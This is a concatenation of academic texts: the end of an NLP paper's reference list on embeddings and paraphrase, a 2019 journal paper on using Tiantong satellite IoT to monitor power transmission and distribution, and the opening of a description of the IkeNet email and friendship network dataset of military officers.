Conference on Empiri- cal Methods in Natural Language Processing, pages 1183–1193. Association for Computational Linguis- tics. Yoshua Bengio, Réjean Ducharme, Pascal Vincent, and Christian Janvin. 2003. A neural probabilistic lan- guage model. The Journal of Machine Learning Re- search, 3:1137–1155. Jonathan Berant and Percy Liang. 2014. Semantic pars- ing via paraphrasing. In Proceedings of ACL. Johannes Bjerva, Johan Bos, Rob van der Goot, and Malvina Nissim. 2014. The meaning factory: For- mal semantics for recognizing textual entailment and determining semantic similarity. SemEval 2014, page 642. William Blacoe and Mirella Lapata. 2012. A compari- son of vector-based representations for semantic com- position. In Proceedings of the 2012 Joint Confer- ence on Empirical Methods in Natural Language Pro- cessing and Computational Natural Language Learn- ing, EMNLP-CoNLL ’12, pages 546–556, Strouds- burg, PA, USA. Association for Computational Lin- guistics. Wauter Bosma and Chris Callison-Burch. 2007. Para- phrase substitution for recognizing textual entail- ment. In Proceedings of the 7th International Confer- ence on Cross-Language Evaluation Forum: Evalua- tion of Multilingual and Multi-modal Information Re- trieval, CLEF’06, pages 502–509, Berlin, Heidelberg. Springer-Verlag. Chih-Chung Chang and Chih-Jen Lin. 2011. Libsvm: a library for support vector machines. ACM Trans- actions on Intelligent Systems and Technology (TIST), 2(3):27. Scott C. Deerwester, Susan T Dumais, Thomas K. Lan- dauer, George W. Furnas, and Richard A. Harshman. 1990. Indexing by latent semantic analysis. JAsIs, 41(6):391–407. Bill Dolan, Chris Quirk, and Chris Brockett. 2004. Un- supervised construction of large paraphrase corpora: Exploiting massively parallel news sources. In Pro- ceedings of Coling 2004, pages 350–356, Geneva, Switzerland, Aug 23–Aug 27. COLING. John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learning and stochastic optimization. J. Mach. Learn. Res., 12:2121–2159, July. Anthony Fader, Luke Zettlemoyer, and Oren Etzioni. 2013. Paraphrase-driven learning for open question answering. In Proceedings of the 51st Annual Meeting of the Association for Computational Linguistics (Vol- ume 1: Long Papers), pages 1608–1618, Sofia, Bul- garia, August. Association for Computational Linguis- tics. 356 Manaal Faruqui, Jesse Dodge, Sujay Kumar Jauhar, Chris Dyer, Eduard Hovy, and Noah A. Smith. 2015. Retrofitting word vectors to semantic lexicons. In Pro- ceedings of the 2015 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics: Human Language Technologies, pages 1606– 1615. Lev Finkelstein, Evgeniy Gabrilovich, Yossi Matias, Ehud Rivlin, Zach Solan, Gadi Wolfman, and Eytan Ruppin. 2001. Placing search in context: The con- cept revisited. In Proceedings of the 10th international conference on World Wide Web, pages 406–414. ACM. J.R. Firth. 1957. A Synopsis of Linguistic Theory, 1930- 1955. Juri Ganitkevitch, Benjamin Van Durme, and Chris Callison-Burch. 2013. Ppdb: The paraphrase database. In HLT-NAACL, pages 758–764. The As- sociation for Computational Linguistics. Kazuma Hashimoto, Pontus Stenetorp, Makoto Miwa, and Yoshimasa Tsuruoka. 2014. Jointly learning word representations and composition functions us- ing predicate-argument structures. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing, Doha, Qatar, October. Associa- tion for Computational Linguistics. Felix Hill, KyungHyun Cho, Sebastien Jean, Coline Devin, and Yoshua Bengio. 2014a. Not all neu- ral embeddings are born equal. arXiv preprint arXiv:1410.0718. Felix Hill, Roi Reichart, and Anna Korhonen. 2014b. Simlex-999: Evaluating semantic models with (gen- uine) similarity estimation. CoRR, abs/1408.3456. Yoon Kim. 2014. Convolutional neural networks for sen- tence classification. In Proceedings of the 2014 Con- ference on Empirical Methods in Natural Language Processing (EMNLP), pages 1746–1751, Doha, Qatar, October. Association for Computational Linguistics. Christopher D. Manning, Mihai Surdeanu, John Bauer, Jenny Finkel, Steven J. Bethard, and David McClosky. 2014. The Stanford CoreNLP natural language pro- cessing toolkit. In Proceedings of 52nd Annual Meet- ing of the Association for Computational Linguistics: System Demonstrations, pages 55–60. Yuval Marton, Chris Callison-Burch, and Philip Resnik. 2009. Improved statistical machine translation using monolingually-derived paraphrases. In Proceedings of the 2009 Conference on Empirical Methods in Natural Language Processing, pages 381–390, Singapore, Au- gust. Association for Computational Linguistics. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013a. Efficient estimation of word representa- tions in vector space. arXiv preprint arXiv:1301.3781. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S Cor- rado, and Jeff Dean. 2013b. Distributed represen- tations of words and phrases and their composition- ality. In Advances in Neural Information Processing Systems, pages 3111–3119. Jeff Mitchell and Mirella Lapata. 2008. Vector-based models of semantic composition. In ACL, pages 236– 244. Citeseer. Jeff Mitchell and Mirella Lapata. 2010. Composition in distributional models of semantics. Cognitive Science, 34(8):1388–1439. Jeffrey Pennington, Richard Socher, and Christopher D Manning. 2014. Glove: Global vectors for word rep- resentation. Proceedings of the Empiricial Methods in Natural Language Processing (EMNLP 2014), 12. Chris Quirk, Chris Brockett, and William Dolan. 2004. Monolingual machine translation for paraphrase gen- eration. In Dekang Lin and Dekai Wu, editors, Pro- ceedings of EMNLP 2004, pages 142–149, Barcelona, Spain, July. Association for Computational Linguis- tics. Pushpendre Rastogi and Benjamin Van Durme. 2014. Augmenting FrameNet via PPDB. In Proceedings of the Second Workshop on EVENTS: Definition, Detec- tion, Coreference, and Representation, pages 1–5, Bal- timore, Maryland, USA, June. Association for Compu- tational Linguistics. Fabio Rinaldi, James Dowdall, Kaarel Kaljurand, Michael Hess, and Diego Mollá. 2003. Exploit- ing paraphrases in a question answering system. In Proceedings of the Second International Workshop on Paraphrasing, pages 25–32, Sapporo, Japan, July. As- sociation for Computational Linguistics. Richard Socher, Christopher D Manning, and Andrew Y Ng. 2010. Learning continuous phrase representa- tions and syntactic parsing with recursive neural net- works. In Proceedings of the NIPS-2010 Deep Learn- ing and Unsupervised Feature Learning Workshop, pages 1–9. Richard Socher, Eric H Huang, Jeffrey Pennin, Christo- pher D Manning, and Andrew Y Ng. 2011. Dynamic pooling and unfolding recursive autoencoders for para- phrase detection. In Advances in Neural Information Processing Systems, pages 801–809. Richard Socher, Alex Perelygin, Jean Wu, Jason Chuang, Christopher D. Manning, Andrew Ng, and Christopher Potts. 2013. Recursive deep models for semantic compositionality over a sentiment treebank. In Pro- ceedings of the 2013 Conference on Empirical Meth- ods in Natural Language Processing, pages 1631– 1642, Seattle, Washington, USA, October. Association for Computational Linguistics. Richard Socher, Andrej Karpathy, Quoc V. Le, Christo- pher D. Manning, and Andrew Y. Ng. 2014. 357 Grounded compositional semantics for finding and de- scribing images with sentences. TACL, 2:207–218. James H Steiger. 1980. Tests for comparing ele- ments of a correlation matrix. Psychological Bulletin, 87(2):245. Xuchen Yao, Benjamin Van Durme, Chris Callison- Burch, and Peter Clark. 2013. Semi-markov phrase- based monolingual alignment. In EMNLP, pages 590– 600. Mo Yu and Mark Dredze. 2014. Improving lexical em- beddings with semantic knowledge. In Proceedings of the 52nd Annual Meeting of the Association for Com- putational Linguistics (Volume 2: Short Papers), pages 545–550, Baltimore, Maryland, June. Association for Computational Linguistics. Mo Yu and Mark Dredze. 2015. Learning composi- tion models for phrase embeddings. Transactions of the Association for Computational Linguistics, 3:227– 242. Fabio Massimo Zanzotto, Ioannis Korkontzelos, Francesca Fallucchi, and Suresh Manandhar. 2010. Estimating linear models for compositional dis- tributional semantics. In Proceedings of the 23rd International Conference on Computational Linguis- tics, pages 1263–1271. Association for Computational Linguistics. 358 work_lkxmpxkzqfbxza6rdqwsawtzra ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 DOI: 10.21307/ijanmc-2019-069 38 Internet of Things Application in Satellite Communication in Power Transmission, Transform and Distribution Dong Chuang Shaanxi Huabiao Network Technology Co., Ltd. Xi’an, 610041, China E-mail: james9894@163.com Abstract—In the national grid enterprise system, the geographical environment of transmission, substation lines and equipment distribution is very complicated. Transmission lines and substation equipment built in complex environments such as plateaus, forests, canyons and borders are often subjected to earthquakes, floods and blizzards. The threat of mudslide disasters, the ground communication network is greatly affected by extreme natural disasters, and it is impossible to repair and rescue in time when disasters occur. In response to the needs of facility operation and maintenance under emergency anomalies, Tiantong No. 1 satellite is a communication satellite with independent intellectual property rights in China. It has functions such as voice communication, image transmission, positioning, and data reporting. It can set up satellite Internet of Things to realize real-time monitoring and equipment. Conveniences such as inspections and emergency rescues reduce the operation and maintenance costs of the power transmission and transformation process. Keywords-Tiantong Satellite; Audio And Video Transmission; Inspection; Satellite Ground Station; Ground Network I. INTRODUCTION The Ubiquitous Electricity Internet of Things connects people , things and power users , power grid enterprises ,power generation enterprises , suppliers and their equipment to generate shared data for users, the grid, power generation, and suppliers And government social services; use the power grid as a hub, play a platform and sharing role, create value for the development of the industry and more market players, and provide value services. The essence of the ubiquitous electric power Internet of Things is to fully apply modern information technologies such as "big data, cloud platforms, the Internet of Things, mobile Internet, artificial intelligence" to create a smart service system with comprehensive status perception, efficient information processing, and convenient and flexible application In January 2019, the State Grid first proposed the strategic goal of “three types (hub type, platform type, shared type) two networks (Strong Smart Grid, Ubiquitous Electricity Internet of Things)” in the “two sessions” report, and proposed the construction The important material foundation of a world-class energy Internet company is to build and operate the "two networks." In March 2019, the State Grid clarified the definition of the ubiquitous electric power IoT for the first time at a teleconference on the deployment of ubiquitous electric power IoT construction work, and proposed a two-phase strategic arrangement for the construction of the next five years. The most urgent and important task is to accelerate the construction of the ubiquitous electric power Internet of Things. At present, a large number of devices and applications have been developed in the application layer, platform layer, network layer and perception layer. Such IoT devices have been deployed in areas covered by terrestrial networks with stable business International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 39 capabilities and reasonable use costs. The development of services in areas without ground network signal coverage urgently needs to be improved, and current ground network and IoT equipment cannot support this demand. Due to the characteristics of the satellite network: covering no dead zones, communication distance has nothing to do with cost, convenient networking, safe and reliable communication, and can be used as a last-guaranteed communication method in the event of ground network paralysis caused by earthquakes, floods, and snowstorms, Particularly suitable as a supplementary application in the power industry. The ubiquitous electric power Internet of Things-related services, in areas where there is no ground network signal coverage, or where new ground networks cover higher cost areas, the most effective technical implementation is achieved by satellite communications using satellites as relays. Ubiquitous power satellite IoT solution. The application of satellites to electricity is accompanied by the rapid development of satellite networks, combined with the objective communication needs of the power industry in areas without ground network coverage. The ubiquitous power satellite IoT will be an extension and supplement of the ubiquitous power IoT. Add satellite communication capabilities on the basis of existing power IoT equipment to ensure that it meets the needs of power applications and expands the use of locations and scenarios. In short, it extends from areas with terrestrial networks to areas without ground network coverage. This article will analyze the application of ubiquitous power satellite IoT in the power system's power generation, transmission, substation distribution and power consumption process. II. OVERVIEW OF SATELLITE COMMUNICATIONS IOT TECHNOLOGY SUPPORT A. Satellite communications overview Satellite mobile communication refers to the use of artificial earth satellites as relay stations to forward radio waves used for communication between mobile users or between mobile users and fixed users to achieve mobile communication between two or more points. Satellite communications generally use the L, S, C, X, Ku, and Ka frequency bands, while high-throughput satellites generally use the C, Ku, and Ka frequency bands. However, resources in the C and Ku frequency bands are tight, so currently Qualcomm satellites are increasingly The development of Ka band, the frequency resources of Ka band are more abundant. Typical satellite mobile communication systems include space segment, ground segment and user segment. The space segment is composed of one or more satellite constellations. As a communication relay station, it provides the connection between the network user and the gateway. The ground segment usually includes the gateway, the network control center, and the satellite control center. Operation; The user segment is composed of various user terminals. There are mainly two types of terminals-mobile terminals and handheld terminals. New satellite technology has developed rapidly, and there are many mature commercial systems, such as Tiantong, High-throughput, Iridium, etc. There are also many satellite newcomers who will launch thousands of satellites and put them into operation in the next few years. Figure 2 Basic composition of International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 40 satellite. Figure 1. Basic composition of satellite communication link B. Satellite communication applications Mobile satellite communications are an effective complement to terrestrial cellular mobile communications. In addition to the characteristics of mobile communications, it also has the inherent advantages of satellite communications, including: ① long communication distances, large coverage areas, and multi-address connectivity. A geosynchronous orbit communication satellite can cover 42% of the earth's surface. The large communication distance between two points on the ground is about 18 000 km, and all earth stations in the area covered by the satellite can use the same satellite to communicate with each other. ② Large communication capacity and many types of transmission services. Typical communication satellites have a capacity of tens to hundreds of megabits per second and can serve hundreds of video channels or tens of thousands of voice and data links. ③ Good communication quality and low line bit error rate. Since the radio waves of mobile satellite communications mainly propagate in the space beyond the atmosphere, the propagation characteristics are relatively stable, and they are not easily affected by natural conditions and interference. The normal operating rate of satellite communications is above 99.8%, and the transmission quality is high. ④ The "on-the-move communication" of the mobile platform can be realized. Diverse users of mobile satellites, satellites Terminals can be mobile carriers located on the ground, at sea, in the air or even in space. It is combined with terrestrial cellular mobile communication systems and other communication systems to form a global coverage seamless communication network. In addition to the above advantages, satellite mobile communication also has the following constraints: ① the size, weight and power consumption of mobile terminal equipment are limited, the size and shape of the antenna are limited by the installed carrier (such as aircraft, cars, ships, etc.), handheld terminals The requirements are even more demanding. ② The satellite antenna beam should be able to adapt to changes in the ground coverage area and keep pointing. The antenna beam of the user's mobile terminal should be able to keep pointing to the satellite as the user moves, or an omnidirectional antenna beam. ③ Due to the movement of the mobile body, when the link between the mobile terminal and the satellite transponder is blocked, a “shadow” effect will occur, causing communication to be blocked. ④ A satellite constellation system composed of multiple satellites requires the establishment of inter-satellite communication links and on-board processing and on-board exchanges, or the establishment of a gateway station with exchange and processing capabilities. C. Development Status of Satellite Communication System 1) Tiantong Satellite The Tiantong-1 satellite mobile communication system is composed of a space segment, a ground segment and a user terminal, and the space segment is planned to consist of multiple geosynchronous orbit communication satellites. As the first star of China’s satellite mobile communication system, Tiantong-1 was launched on August 6, 2016. It belongs to China International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 41 Satellite Communications Group Co., Ltd. It is mainly developed by China Academy of Space Technology and uses new plastic antennas. New equipment and technologies such as stand-alone integrated technology, the communication frequency is designed in the S band, and the cellular technology with a bandwidth of 30 MHz can form hundreds of spot beams. The signal transmission loss is small and the communication quality can be effectively guaranteed. At the same time, it uses communication satellite frequency multiplexing technology and a large-scale expandable antenna on board, which greatly improves the sensitivity of satellite receiving signals and increases the capacity of satellite communications. The area covered by the 01 star of Tiantong No. 1 is mainly China and its surroundings, the Middle East, Africa and other related regions, and most of the Pacific Ocean and the Indian Ocean. There are no restrictions on the coverage of the terrain, and the ocean, mountains, Shangyuan, forests, Gobi, and desert can be seamlessly covered. Covers all types of mobile users including vehicles, airplanes, ships, and individuals. It provides all-weather, all-day, stable and reliable mobile communication services for various fields such as personal communications, marine transportation, ocean fishing, aviation rescue, and tourism research. When natural disasters occur in voice, short message and data services, the emergency communication capabilities of Tiantong One can play a great role. In addition, the main advantages of Tiantong One 01 are reflected in the miniaturization and mobile phone of the terminal, which is easy to carry. The ground service of Tiantong No. 01 is operated by China Telecom Corporation, which will form a mobile communication network with ground mobile communication systems, and provide voice and data communication coverage for various handheld and small mobile terminals in China's land and surrounding sea areas. It is understood that China Telecom has launched an operation and plans to launch a mobile phone with mobile satellite communication capabilities. Even if it reaches the end of the earth, you can use it to talk to family and friends, send text messages, chat on WeChat, and communicate with video. Figure 2. Tiantong-1 satellite mobile communication system International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 42 It is estimated that by 2025, China ’s mobile communication satellite system will have more than 3 million end users, and its services will cover disaster relief, personal communications, marine transportation, ocean fishing, air passenger transport, bipolar scientific research, and international peacekeeping. During this period, we will also launch multiple Tiantong-1 satellites to further increase the satellite mobile communication service capacity and coverage area, and expand from the surrounding areas of China to form a regional mobile communication system integrating satellite and ground integration to achieve satellite mobile communication. Large-scale application and operation build an important support platform for the country's 'Belt and Road' strategy. 2) Iridium Satellite 1. The Iridium satellite system was the first LEO satellite cellular system with global coverage. It was launched by Motorola in the late 1980s and developed in the early 1990s. The "Iridium" star system includes space segment, ground segment and user segment[9]. The networking and coverage are shown in Figure 2. Space segment The initial design of the constellation consisted of 77 LEO satellites, evenly distributed in 7 polar orbits, and all satellites were moving in the same direction. It is similar to the 77 electrons of iridium orbiting the nucleus, hence the name of the system. The actual constellation consists of 66 satellites distributed on 6 circular near-polar orbital planes with an inclination of 86.4°, with an interval of 27° and an orbital height of 780 km. Each satellite provides 48 spot beams, forming 48 cells on the ground. At a small elevation angle of 8.2°, the diameter of each cell is 600 km, and the coverage area of each satellite is approximately 4700 km. The constellation forms seamless cellular coverage on the global ground. One spot beam of each satellite supports 80 channels, A single satellite can provide 3840 channels. It was officially operated on November 1, 1998. At present, it has more than 1.5 million users and uses 66 low-orbit satellites to cover the world. The characteristics are low orbit, fast transmission speed, small information loss, and greatly improved communication quality. The ground receiving station, equipment is miniaturized, and it is interconnected with the ground network, which makes the communication in the uninhabited, barren land, remote areas with backward communication, and the scene of natural disasters unobstructed. Figure 3. Iridium satellite system International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 43 3) High Throughput Satellite The "Practice No. 13" satellite first applied Ka-band broadband technology to China's communication satellites, with a total communication capacity of 20Gbps, exceeding the total capacity of communication satellites developed and launched in China, marking that China's satellite communications has entered a high-throughput era At the same time, the "Thirteenth Practice" satellite carried out the first international two-way laser communication test between high-orbit satellites and the ground, with a speed of up to 5Gbps, which established China's global leading position in the field of high-speed space information transmission. The "Thirteenth" satellite is China's first electric propulsion satellite. Compared with conventional chemical propulsion satellites, its launch weight is greatly reduced, which reduces the requirements for the carrying capacity of the launch vehicle. The amount of data will no longer be a constraint on the life of the satellite, and the design life of the communication satellite will generally exceed the current 15-year limit and reach 18 to 20 years. The "Practice No. 13" satellite will mainly provide services for users in China and other regions. It can realize the access of mobile communication base stations in remote areas and be used in the fields of enterprise private networks, distance education, medical treatment, digital news gathering and emergency communications. At the same time, the star can facilitate users to quickly access the network, download and return rates up to 150Mbps and 12Mbps, which can effectively meet the needs of passengers on the high-speed vehicles such as aircraft, high-speed rail to access the Internet anytime, anywhere. High-throughput satellites are an important part of satellite communications and broadcasting systems in China's integrated space-ground information network. They are an effective complement to terrestrial communication systems and can be widely used in areas where terrestrial communication systems are difficult to cover or where construction costs are high. After the completion of the “Global Coverage, On-Demand Access, On-Demand Services, Safe and Trustworthy” integrated information network in the world, China will have global space-time continuous communication, highly reliable and secure communication, regional large-capacity communication, and high-mobility full-range information transmission. And other capabilities to meet national strategic needs such as expanding national interests, safeguarding national security, safeguarding national economy and people's livelihood, and promoting economic development. In view of the strategic significance of high-throughput satellites in the space and information fields, China will continue to deploy ultra-high-capacity high-throughput satellites. It is expected that by 2020, it will form a communication capacity that can cover the entire territory of China and the Asia-Pacific region with a capacity of nearly 200Gbps. To meet the urgent needs for broadband communications in the construction work of "Broadband China" and the country's "Belt and Road", the relevant industrial chain is expected to usher in rapid development. 4) 'Hongyan' Project Construction goal: "Communicate and connect everything, the world will never lose touch" It is planned to invest 100 billion yuan in 300 low-orbit satellites. The first test star was launched on December 29, 2018. The backbone constellation system is expected to be built in 2023. Its satellite data exchange function can provide two-way, real-time data transmission worldwide, as well as multimedia data services such as short messages, pictures, audio, and video. After the system is completed, services such as intelligent terminal communications, Internet of Things, mobile broadcasting, navigation enhancement, aviation and maritime surveillance, and broadband Internet access will be launched. The system has a International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 44 global real-time communication capability under all-weather and full-time terrain conditions. 5) 'Hongyun' Project China Aerospace Science and Industry plans to launch 156 satellites. The satellites will be networked in orbits 1,000 kilometers above the ground to build a space-borne broadband global mobile internet network. The first test star was launched on December 22, 2018. The entire Hongyun project is divided into three phases. The first phase is to launch the first star at the end of 2018; the second phase is to launch four business test stars at the end of the "Thirteenth Five-Year Plan", or before the end of 2020; the third stage is to "Ten In the middle of the 4th Five-Year Plan period, around 2023, 156 satellites will be launched, and the construction of the heaven-earth integration system will be completed initially, with full operating conditions. After the entire plan is completed, it will realize Internet access at anytime, anywhere, on the “Belt and Road” and even globally, and achieve a high-speed, high-quality Internet / IoT application experience. 6) OneWeb of United States One Web plans to deploy 648 small satellites in low-Earth orbit to form an Internet satellite network, enabling users around the world to connect to satellites and access 3G, LTE, 5G, and Wi-Fi networks through small, low-cost user terminals. It is characterized by multiple satellites, interconnection with the Internet, and a single ground terminal download rate of 50Mbps. 7) SpaceX of United States SpaceX Starlink:7, 518 low-Earth orbit satellites not exceeding 346 kilometers in height (Launch of Microsat-2a and Microsat-2b in early 2018) III. APPLICATION OF SATELLITE COMMUNICATION IN THE PROCESS OF POWER TRANSMISSION, TRANSFORMATION AND DISTRIBUTION A. Transmission fault monitoring system The transmission fault monitoring system, consisting of tower poles, sensor cluster, satellite wireless transceiver, power monitoring center, and mobile phone of the responsible person, to realize the status monitoring, information reporting, and fault early warning of the transmission line. The transmission fault monitoring system is a supplement to the online monitoring system of the entire smart grid transmission line. By using satellite technology, it provides strong support in areas that cannot be covered by existing monitoring systems. The business capability is increased to realize the visual real-time monitoring and fault early warning of various states of the transmission line without the coverage of the ground network. The monitoring of the status of important electrical devices on the tower pole, such as circuit breakers, load switches, section switches, and other switch monitoring and fault early warning on 10kV lines. The logic diagram of the high-level scheme of the transmission fault monitoring system is shown below: Figure 4. The logic diagram of the high-level scheme of the transmission fault monitoring system International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 45 The description of each part of the transmission fault monitoring system is as follows: Satellite STU: It acts as an information transmission channel, and is particularly suitable for routine monitoring scenarios in areas without ground network coverage and disaster prevention and relief scenarios in areas without ground network coverage. Power monitoring center: It is the existing monitoring center of the power system, not a newly deployed system platform, in order to save customers' capital investment budget to the greatest extent. Responsible person's mobile phone: When an important failure occurs, the corresponding responsible person's personal mobile phone is notified by SMS to speed up the progress of failure handling and reduce accident losses. Of course, the level of important faults and the mobile phone number of the person in charge can be set before the implementation of the plan, which will not cause excessive SMS business and bring unnecessary pressure on the Responsible person Sensor clusters: The main business capabilities realized in the entire scheme, that is, the types of transmission line status collection, depend on the configuration of the sensor clusters. B. Distribution fault monitoring system Transformer fault monitoring system, consisting of tower poles, sensor clusters, satellite STU, power monitoring center, and mobile phone of the responsible person, realize the status monitoring, platform docking, information reporting and fault early warning of distribution and transformation links. The power distribution fault monitoring system is a solution to the fault monitoring and early warning requirements of physical nodes in the power distribution and transformation business that need to increase communication support. Conventional equipment on the ground network can partially address these needs, but cannot guarantee emergency communications during natural disasters. The terminal equipment STU used in the power distribution fault monitoring system is a combination of terrestrial network DTU, terrestrial network TTU, and satellite terminal technology, which can improve the reliability in the process of power distribution and transformation. Considering the cost of satellite service, it is recommended to construct and install it in important substations and distribution stations, but not in ordinary stations. Figure 5. The logic diagram of the high-level scheme of the Distribution fault monitoring system Satellite STU: It acts as an information transmission channel, and is particularly suitable for routine monitoring scenarios in areas without ground network coverage and disaster prevention and relief scenarios in areas without ground network coverage. Power monitoring center: It is the existing monitoring center of the power system, not a newly deployed system platform, in order to save customers' capital investment budget to the greatest extent. Responsible person's mobile phone: When an important failure occurs, the corresponding responsible person's personal mobile phone is notified by SMS to speed up the progress of failure handling and reduce accident losses. Of course, the level of important faults and the mobile phone number of the person in charge can be set before the implementation of the plan, International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 46 which will not cause excessive SMS business and bring unnecessary pressure on the Responsible person The satellite mobile communication system can quickly form an emergency communication network in an emergency area without relying on the original communication network, enabling the field headquarters and the command center to quickly establish communication links, and provide a certain bandwidth transmission rate, while transmitting voice, images, and data And other information, supporting real-time transmission of multi-directional dynamic images, high-definition video conferences, etc. Therefore, the use of satellite mobile communication means can realize emergency communications support for emergency rescue and disaster relief in large-scale disasters and meet the requirements of "all-weather, whole-process, all-round" emergency communications support, which is the future development trend of emergency communications. IV. CONCLUSION In the event of a very catastrophic disaster such as a blizzard, hurricane, earthquake, mudslide, etc., public communication network facilities may be catastrophically damaged and paralyzed. At this time, the communication of the emergency report and rescue command is urgent, which is convenient for effectively monitoring the field power transmission and transformation facilities, and at the same time, it can achieve rapid and effective rescue in the event of a disaster. The monitoring program uses China’s Tiantong satellite with independent intellectual property rights to establish a remote monitoring system for power transmission and transformation facilities based on the Internet of Things of Satellites. This system has high security and anti-interference, and can effectively solve remote monitoring of the wild environment. , Data communication, positioning and other problems, to facilitate better operation and maintenance of power transmission and transformation facilities, reduce the failure rate of facilities, improve accident repair capacity, rescue timeliness and power supply reliability. REFERENCES [1] Lv Ziping, Liang Peng, Chen Zhengjun. Development Status and Trends of Satellite Mobile Communications[J]. Satellite Application, 2016(01):48-55. [2] Liu Yue. Review on the Development of GEO Mobile Communication Satellite Technology[J]. International Space, 2013(10):26-31. [3] Xu Feng, Chen Peng. Development Progress and Trends of Foreign Satellite Mobile Communications[J]. Telecommunication Engineering, 2011, 51(06):156-161. [4] He Shanbao. Inmarsat System and Its New Development[J].Space International, 2009(09):31-34. [5] Andrew D S, Paul S. Utilizing the Globalstar Network for Satellite Communications in Low Earth Orbit[C].54th AIAA Aerospace Sciences Meeting, 2016:1-8. [6] Huang Huashan. Application and Development of Satellite Mobile Communication[J].China High-Tech Enterprises, 2014(26):9-11. [7] MA Chong, ZUO Peng, WANG Zhen-hua. Inmarsat System and its Application in Emergency[J]. Satellite Application, 2009(06):31-35. [8] Zhu Lidong. Review on Development and New Technologies of Military Satellite Communications Aboard[J].Radio Communications Technology, 2016, 42(05):1-5． [9] Lv Ziping, Zhang Gengxin, Liang Peng. The Development and Orientation of China’s GEO and LEO Mobile Satellite Communications[J].Digital Communication World, 2016(07):26-28. [10] Xiao Longlong, Liang Xiaojuan, Li Xin. The Development and Application of Satellite Mobile Communication System. work_louh5h74dzaxlfocwpwaujtysu ---- Microsoft Word - Volume37_final insna.org | Issues 1&2 | Volume 37 | 89 IkeNet: Email and Friendship Evolution Ian McCulloh Abstract Network evolution is an important problem for social scientists, management consultants, and social network scholars. Unfortunately, few empirical data sets exist that have sufficient data to fully explore evolution dynamics. Increasingly, more and more online data sets are used in lieu of offline, face-to-face data. The veracities of these findings are questionable, however, because there are few studies exploring the similarity of online-offline dynamics. The IkeNet project investigated online and offline network evolution. Empirical data was collected on a group of 22 mid-career military officers going through a one-year graduate program. Data collection included email communication collected from the Exchange server, as well as self- reported friendship, and time spent together, over a course of 20 weeks. Numerous attribute data on the individual actors was collected from their military personnel files. The data allows network scholars to conduct research into the dynamics of network evolution and allows edu- cators a real-world example data set for use in classroom instruction. Author Ian McCulloh holds joint appointments as a Parson’s Fellow in the Bloomberg School of Public health, a Senior Lecturer in the Whiting School of Engineering and a senior scientist at the Applied Physics Lab, at Johns Hopkins University. He is the Chief Technology Officer for Arrow Analytics, a management and neural marketing consulting firm. His current research is focused on strategic influence in online networks. His most recent papers have been focused on the neuroscience of persuasion and measuring influence in online social media firestorms. He is the author of “Social Network Analysis with Applications” (Wiley: 2013), “Networks Over Time” (Oxford: forthcoming) and has published 48 peer-reviewed papers, primarily in the area of social network analysis. He retired as a Lieutenant Colonel from the US Army after 20 years of service in special operations and improvised explosive device forensics. He founded the West Point Network Science Center and created the Army’s Advanced Network Analysis and Targeting (ANAT) program. Please send all correspondence to imccull4@jhu.edu Connections IkeNet: Email and Friendship Evolution 90 | Volume 37 | Issues 1&2 | insna.org 1. Overview The IkeNet data is from one year of a five- year strategic study of social networks among mid-career military officers admit- ted to a one-year graduate program run jointly by Columbia University and the U.S. Military Academy at West Point. Most of these students/officers serve for two to three years as tactical officers at West Point following completion of their master’s degree program. Tactical officers are responsible for overseeing the cadet chain of command at the U.S. Military Academy and for providing the primary leadership training for cadets. This data focuses on friendship formation and evolution during the first 20 weeks of their program. The stu- dents/officers were recruited for this study on the first morning of their graduate pro- gram, prior to meeting other participants for the first time, although some subjects may have had random interaction with each other in the past. The first network survey was collected during that morning, and then weekly for the following time pe- riods. One subject out of 22 chose not to participate in this study. The response rate on self-reported survey data among the participants was 97%, which creates a 92% overall response rate. Email data was cap- tured at the exchange server, therefore that response rate is 100%. This presents a unique data set for exploration of friend- ship formation, multi-level network analy- sis, longitudinal network analysis, and comparison between email and face-to- face networks. 2. Data Collection Social network data was collected on a group of 21 mid-career officers in the U.S. Military. The officers were all enrolled in the Eisenhower Leadership Development Program (ELDP) where they complete a one-year graduate program administered jointly by Columbia University and the U.S. Military Academy. Social networks included self-reported friendship, time spent together, and email communication collected from the central email exchange server (Ring et al., 2008). Data was col- lected beginning on the first day that the officers reported for duty and met each other for the first time. They were all given blackberries that allowed them to be con- nected to their military email accounts to facilitate email communication for the purpose of the project. The specific year of this data is in- tentionally omitted to protect the privacy of the respondents. The “IkeNet” project was conducted over five years from 2006 to 2011. In this particular year, 21 of 22 of- ficers in the program consented to be par- ticipants in this project. All data from the non-consenting officer were removed to protect their privacy. The U.S. Army and the West Point Institutional Review Boards approved this research. Surveys were conducted on a week- ly schedule, collecting network data on friendship and time spent together for 20 weeks. The boundary of the network was defined using a realist approach (Wasser- man and Faust, 1994; McCulloh et al., 2013). The boundaries in this experiment were the members of the Eisenhower Leadership Development Program (ELDP). This group consisted of 21 offic- ers. Two of the officers were women and 19 were men. One of the men was a U.S. Coast Guard officer, while the other 20 of- ficers were in the U.S. Army. There were 17 Caucasian officers to include the two women. Three of the officers were Black and one was Asian. The ages of the offic- ers ranged from 26 to 33, with most offic- ers aged 30. Attribute data was collected on the participants from their officer record brief (ORB). The ORB contains a wealth of in- formation on the officers. Six officers to include the two women were Roman Cath- olic. 12 officers were of various protestant Christian denominations. For the purpose of this study, they were coded as protestant. This decision was made, be- cause on military installations all protestant faiths meet in a non- IkeNet: Email and Friendship Evolution Connections insna.org | Issues 1&2 | Volume 37 | 91 denominational protestant service, while Roman Catholics meet in a different ser- vice. Therefore, it is likely that if protestant officers attend church, they are likely to attend the same church regardless of their specific denomination. One officer was Buddhist, one had no preference re- ported for religion, and no data was availa- ble for the Coast Guard officer. Several experiments have recently been run out of West Point concerning the formation of email networks. Two collec- tion methods identified include decentral- ized, client-side collection and a central- ized collection of messages from the mail 